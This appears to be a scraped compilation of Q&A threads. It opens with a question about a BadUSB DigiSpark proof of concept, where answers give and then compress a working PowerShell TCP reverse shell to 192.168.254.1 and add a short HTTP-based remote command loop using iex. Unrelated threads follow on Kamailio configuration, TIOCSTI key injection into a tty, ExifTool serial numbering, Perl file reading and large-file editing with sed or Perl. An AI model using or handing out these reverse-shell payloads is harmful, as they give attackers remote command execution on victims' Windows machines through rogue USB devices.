TCP reverse shell on Windows - windows

I am trying to implement a proof of concept BadUSB DigiSpark that can emulate a HID keyboard and open a reverse shell just using Windows default package (i.e. PowerShell and/or CMD).
What I have found so far:
#$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();
[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
Taken from Week of PowerShell Shells - Day 1.
Despite working, the aforementioned code takes too long to be typed.
Is it possible to create a reverse shell with fewer lines of code?

284 characters. Yes you can have fewer "lines of code" just by putting them all on one line, and you can't have fewer than one line, so hooray, best case already achieved.
:-| face for not even using the same tricks consistently within the same code. And for not giving any way to test it.
remove all the semicolons.
remove the space around -ne 0
remove -ne 0 because numbers cast to true and 0 casts to false
single character variable names
drop port 55555 to 5555
Change byte array from
[byte[]]$bt=0..255|%{0}
$b=[byte[]]'0'*256 # does it even need to be initialized to 0? Try without
Nest that into the reading call because who cares if it gets reinitialized every read.
[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;
#becomes
while(($i=$t.Read(($b=[byte[]]'0'*256),0,$b.Length))){
You can call [text.encoding]::ASCII.GetString($b) directly, but why ASCII? If it works if you can drop the encoding, then do
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
#becomes
$d=-join[char[]]$b
but you're only using that to call iex so put it there and don't use a variable for it. And do similar to make the byte array without calling ASCII as well...
... and: 197 chars, 30% smaller:
$t=(new-object Net.Sockets.TCPClient("192.168.254.1",5555)).GetStream()
while(($i=$t.Read(($b=[byte[]]'0'*256),0,$b.Length))){
$t.Write(($s=[byte[]][char[]](iex(-join[char[]]$b)2>&1)),0,$s.Length)}
Assuming it works, with no way to test it, it probably won't.
Edit: I guess if you can change the other side completely, then you could make it so the client would use JSON to communicate back and forth, and do a tight loop of
$u='192.168.254.1:55555';while(1){irm $u -m post -b(iex(irm $u).c)}
and your server would have to have the command ready in JSON like {'c':'gci'} and also accept a POST of the reply...
untested. 67 chars.

Related

Kamailio 4.4 seturi Only Accepts Explicit Strings?

I've been working at implementing a simple serial forking described in the TM module's documentation (the Q values are stored as a priority weight in a mysql table) where my proxy is querying a database to determine to what domain to forward to.
I've verified through extensive use of xlog that a variable I'm using to build the new URI to use with seturi is getting everything correctly. I use an append_branch call in a subsequent while loop iterating over my sql query results, which doesn't have any problems with taking a very similarly formatted parameter. However, when I go to restart Kamailio it simply gripes at me that a string is expected. The line it corresponds to from console is just the seturi call. I've tried casting as a string, but that doesn't seem to be part of 4.4 (or my syntax is wrong).
I've thought about building the URI strings and storing into avp, but I suspect I'd have the same problem.
For reference, this is what I'm doing:
$var(basedest) = "sip:" + $var(number) + "#" + $(dbr(destination=>[0,0]))+ ":" + $var(port);
seturi($var(basedest));
And what it's outputting when trying to load the config:
<core> [cfg.y:3368]: yyerror_at(): parse error in config file //etc/kamailio/kamailio.cfg, line 570, column 9-22: syntax error
<core> [cfg.y:3371]: yyerror_at(): parse error in config file //etc/kamailio/kamailio.cfg, line 570, column 23: bad argument, string expected
Naturally, when I put $var(basedest) in double quotes, it's literally interpreted as a string. Single quotes behave similarly. Is there something I can do to work around this? When I feed it an explicit hardcoded string, it's happy as a can be and the routing works fine. When I try to do something very simple like the above, it gets upset. If possible, I'd like to avoid updating as I initially grabbed Kamailio from the yum repo.
Thanks in advance - this has been bugging me a good while.
Apparently, not a new problem. I ended up finding out what I can do to work around it.
For reference, seturi and $ru pseudo variable refer to the same thing. So basically you'd just do:
$var(mynewru) = "sip:user#domain:5060";
$ru = $var(mynewru);
This would achieve the same thing I was originally attempting to do before based on the TM module's documentation. For serial forking, issuing some number of append_branch calls is fine.

Injecting key combinations into Bash tty using TIOCSTI in Python

I am trying to inject key combinations (like ALT+.) into a tty using the TIOCSTI in Python.
For some key combinations I have found the corresponding hex code for Bash shells using the following table which works good.
From this table I can see that for example CTRL+A is '\x01' etc.
import sys,os,Queue
import termios,fcntl
# replace xx with a tty num
tty_name = "/dev/pts/xx";
parent_fd = os.open(tty_name, os.O_RDWR)
special_char = "Ctrl_a"
if special_char == "Ctrl_a":
send_char = '\x01'
if special_char == "Ctrl_e":
send_char = '\x05'
if special_char == "Ctrl_c":
send_char = '\x03'
fcntl.ioctl(self.parent_fd, termios.TIOCSTI, send_char)
But how can I get the hex codes for other combinations such as
ALT+f etc. I need a full list or a way how to get this information for any possible combo as I want to implement most bash shortcuts for moving, manipulating the history etc. to inject.
Or is there any other way to inject key-combinations using TIOCSTI ?
As I can only send single chars to a tty I wonder if there is anything else possible.
Thank you very much for your help!
The usual working of "control codes" is that the "control" modifier substracts 64 from the character code.
"A" is ASCII character 65, so "Ctrl-A" is "65-64=1".
Is it enough for you to extend this scheme to your situation?
So, if you need the control code for, for example, "Device Control 4" (ASCII code 20), you'd add 64, to obtain "84", which is "T".
Therefore, the control-code for DC4 would be "Control+T".
In the reverse direction, the value for "Control+R" (history search in BASH) is R-64, so 82-64=18 (Device Control 2)
ASCIItable.com can help with a complete listing of all character codes in ASCII
Update: Since you were asking specifically for "alt+.":
The 'Control mean minus 64" doesn't apply to Alt, unfortunately; that seems to be handled completely differently, by the keyboard driver, by generating "key codes" (also called "scancodes", variably written with or without spaces) that don't necessarily map to ASCII. (Keycodes just happen to map to ASCII for 0-9 and A-Z, which leads to much confusion)
This page lists some more keycodes, including "155" for "alt+."

Increment Serial Number using EXIF

I am using ExifTool to change the camera body serial number to be a unique serial number for each image in a group of images numbering several hundred. The camera body serial number is being used as a second place, in addition to where the serial number for the image is in IPTC, to put the serial number as it takes a little more effort to remove.
The serial number is in the format ###-###-####-#### where the last four digits is the number to increment. The first three groups of digits do not change for each batch I run. I only need to increment that last group of digits.
EXAMPLE
I if I have 100 images in my first batch, they would be numbered:
811-010-5469-0001, 811-010-5469-0002, 811-010-5469-0003 ... 811-010-5469-0100
I can successfully drag a group of images onto my ExifTool Shortcut that has the values
exiftool(-SerialNumber='001-001-0001-0001')
and it will change the Exif SerialNumber Tag on the images, but have not been successful in what to add to this to have it increment for each image.
I have tried variations on the below without success:
exiftool(-SerialNumber+=001-001-0001-0001)
exiftool(-SerialNumber+='001-001-0001-0001')
I realize most likely ExifTool is seeing these as numbers being subtracted in the first line and seeing the second line as a string. I have also tried:
exiftool(-SerialNumber+='1')
exiftool(-SerialNumber+=1)
just to see if I can even get it to increment with a basic, single digit number. This also has not worked.
Maybe this cannot be incremented this way and I need to use ExifTool from the command line. If so, I am learning the command line/powershell (Windows), but am still weak in this area and would appreciate some pointers to get started there if this is the route I need to take. I am not afraid to use the command line, just would need a bit more hand holding then normal for a starting point. I also am learning Linux and could do this project from there but again, not afraid to use it, just would need a bit more hand holding to get it done.
I do program in PHP, JavaScript and other languages so code is not foreign to me. Just experience in writing it for the command-line.
If further clarification is needed, please let me know in the comments.
Your help and guidance is appreciated!
You'll probably have to go to the command line rather than rely upon drag and drop as this command relies upon ExifTool's advance formatting.
Exiftool "-SerialNumber<001-001-0001-${filesequence;$_=sprintf('%04d', $_+1 )}" <FILE/DIR>
If you want to be more general purpose and to use the original serial number in the file, you could use
Exiftool "-SerialNumber<${SerialNumber}-${filesequence;$_=sprintf('%04d', $_+1 )}" <FILE/DIR>
This will just add the file count to the end of the current serial number in the image, though if you have images from multiple cameras in the same directory, that could get messy.
As for using the command line, you just need to rename to remove the commands in the parens and then either move it to someplace in the command line's path or use the full path to ExifTool.
As for clarification on your previous attempts, the += option is used with numbers and with lists. The SerialNumber tag is usually a string, though that could depend upon where it's being written to.
If I understand your question correctly, something like this should work:
1..100 | % {
$sn = '811-010-5469-{0:D4}' -f $_
# apply $sn
}
or like this (if you iterate over files):
$i = 1
Get-ChildItem 'C:\some\folder' -File | % {
$sn = '811-010-5469-{0:D4}' -f $i
# update EXIF data of current file with $sn
$i++
}

difference between iterating lines with while and array assignment

I'm writing a perl script that reads a file into an array. I wrote the program on Windows, using Perl 5.16 (it also works on 5.14), and the script failed using a Mac with Perl 5.12.
The part that failed is this: my #array = <$file>. On the Mac, the array came back the correct size (same as number of lines in the file), but every element except the last one was empty. The code worked correctly when I switched to this instead:
my #array;
while(<$file>){
push #array, $_;
}
I'm not sure if it would have made a difference if I switched the line endings to be LF instead of CRLF (Windows style). Though the problem is fixed, it leaves me puzzled. I thought those two code snippets I listed were exactly the same thing. What is the difference in them that produces different results here?
The answer is that the two methods are exactly equivalent, as you suspected. Example:
my $start = tell DATA; #store beginning filehandle position
my #array1 = <DATA>;
seek DATA,$start,0; #reset filehandle position
my #array2;
while(<DATA>){
push #array2,$_;
}
print "List assignment:\n #array1\n";
print "Looping through:\n #array2\n";
__DATA__
1
2
foo
bar
Your previous failure was likely something else. Perhaps some sort of problem with Perl on Mac or Mac's file IO was involved, but more likely it was some other part of your code (by this I mean nothing personal: I would make the same assumption about my own code).

sed optimization (large file modification based on smaller dataset)

I do have to deal with very large plain text files (over 10 gigabytes, yeah I know it depends what we should call large), with very long lines.
My most recent task involves some line editing based on data from another file.
The data file (which should be modified) contains 1500000 lines, each of them are e.g. 800 chars long. Each line is unique, and contains only one identity number, each identity number is unique)
The modifier file is e.g. 1800 lines long, contains an identity number, and an amount and a date which should be modified in the data file.
I just transformed (with Vim regex) the modifier file to sed, but it's very inefficient.
Let's say I have a line like this in the data file:
(some 500 character)id_number(some 300 character)
And I need to modify data in the 300 char part.
Based on the modifier file, I come up with sed lines like this:
/id_number/ s/^\(.\{650\}\).\{20\}/\1CHANGED_AMOUNT_AND_DATA/
So I have 1800 lines like this.
But I know, that even on a very fast server, if I do a
sed -i.bak -f modifier.sed data.file
It's very slow, because it has to read every pattern x every line.
Isn't there a better way?
Note: I'm not a programmer, had never learnt (in school) about algorithms.
I can use awk, sed, an outdated version of perl on the server.
My suggested approaches (in order of desirably) would be to process this data as:
A database (even a simple SQLite-based DB with an index will perform much better than sed/awk on a 10GB file)
A flat file containing fixed record lengths
A flat file containing variable record lengths
Using a database takes care of all those little details that slow down text-file processing (finding the record you care about, modifying the data, storing it back to the DB). Take a look for DBD::SQLite in the case of Perl.
If you want to stick with flat files, you'll want to maintain an index manually alongside the big file so you can more easily look up the record numbers you'll need to manipulate. Or, better yet, perhaps your ID numbers are your record numbers?
If you have variable record lengths, I'd suggest converting to fixed-record lengths (since it appears only your ID is variable length). If you can't do that, perhaps any existing data will not ever move around in the file? Then you can maintain that previously mentioned index and add new entries as necessary, with the difference is that instead of the index pointing to record number, you now point to the absolute position in the file.
I suggest you a programm written in Perl (as I am not a sed/awk guru and I don't what they are exactly capable of).
You "algorithm" is simple: you need to construct, first of all, an hashmap which could give you the new data string to apply for each ID. This is achieved reading the modifier file of course.
Once this hasmap in populated you may browse each line of your data file, read the ID in the middle of the line, and generate the new line as you've described above.
I am not a Perl guru too , but I think that the programm is quite simple. If you need help to write it, ask for it :-)
With perl you should use substr to get id_number, especially if id_number has constant width.
my $id_number=substr($str, 500, id_number_length);
After that if $id_number is in range, you should use substr to replace remaining text.
substr($str, -300,300, $new_text);
Perl's regular expressions are very fast, but not in this case.
My suggestion is, don't use database. Well written perl script will outperform database in order of magnitude in this sort of task. Trust me, I have many practical experience with it. You will not have imported data into database when perl will be finished.
When you write 1500000 lines with 800 chars it seems 1.2GB for me. If you will have very slow disk (30MB/s) you will read it in a 40 seconds. With better 50 -> 24s, 100 -> 12s and so. But perl hash lookup (like db join) speed on 2GHz CPU is above 5Mlookups/s. It means that your CPU bound work will be in seconds and you IO bound work will be in tens of seconds. If it is really 10GB numbers will change but proportion is same.
You have not specified if data modification changes size or not (if modification can be done in place) thus we will not assume it and will work as filter. You have not specified what format of your "modifier file" and what sort of modification. Assume that it is separated by tab something like:
<id><tab><position_after_id><tab><amount><tab><data>
We will read data from stdin and write to stdout and script can be something like this:
my $modifier_filename = 'modifier_file.txt';
open my $mf, '<', $modifier_filename or die "Can't open '$modifier_filename': $!";
my %modifications;
while (<$mf>) {
chomp;
my ($id, $position, $amount, $data) = split /\t/;
$modifications{$id} = [$position, $amount, $data];
}
close $mf;
# make matching regexp (use quotemeta to prevent regexp meaningful characters)
my $id_regexp = join '|', map quotemeta, keys %modifications;
$id_regexp = qr/($id_regexp)/; # compile regexp
while (<>) {
next unless m/$id_regexp/;
next unless $modifications{$1};
my ($position, $amount, $data) = #{$modifications{$1}};
substr $_, $+[1] + $position, $amount, $data;
}
continue { print }
On mine laptop it takes about half minute for 1.5 million rows, 1800 lookup ids, 1.2GB data. For 10GB it should not be over 5 minutes. Is it reasonable quick for you?
If you start think you are not IO bound (for example if use some NAS) but CPU bound you can sacrifice some readability and change to this:
my $mod;
while (<>) {
next unless m/$id_regexp/;
$mod = $modifications{$1};
next unless $mod;
substr $_, $+[1] + $mod->[0], $mod->[1], $mod->[2];
}
continue { print }
You should almost certainly use a database, as MikeyB suggested.
If you don't want to use a database for some reason, then if the list of modifications will fit in memory (as it currently will at 1800 lines), the most efficient method is a hashtable populated with the modifications as suggested by yves Baumes.
If you get to the point where even the list of modifications becomes huge, you need to sort both files by their IDs and then perform a list merge -- basically:
Compare the ID at the "top" of the input file with the ID at the "top" of the modifications file
Adjust the record accordingly if they match
Write it out
Discard the "top" line from whichever file had the (alphabetically or numerically) lowest ID and read another line from that file
Goto 1.
Behind the scenes, a database will almost certainly use a list merge if you perform this alteration using a single SQL UPDATE command.
Good deal on the sqlloader or datadump decision. That's the way to go.

Resources